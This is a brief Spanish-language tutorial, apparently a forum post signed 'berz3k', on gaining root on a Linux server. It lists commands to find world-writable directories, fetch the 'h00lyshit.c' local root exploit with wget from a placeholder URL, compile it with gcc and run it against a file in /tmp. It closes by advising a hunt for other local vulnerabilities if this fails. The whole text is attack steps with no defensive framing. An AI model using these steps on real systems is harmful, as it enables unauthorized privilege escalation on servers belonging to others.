Buscando directorios "escribibles"
Código:
$find / -perm -2 -ls
Generalmente el /tmp tiene permisos de escritura, ahora busca el codigo llamado "h00lyshit.c" por google o alguna de tantas paginas que lo hospeda y descargalo:
Código:
$ wget http://google/h00lyshit.c
Compila el exploit
Código:
$gcc h00lyshit.c -o h00lyshit
Ejecuta ahora el binario que te creeo:
Código:
$./h00lyshit /tmp/archivogrande
Si todo marcha bien seras root, si no fue asi tendras que buscar mas vulnerabilidades LOCALES en el servidor para lograr el root o seguramente esta algo parchado.
-berz3k.





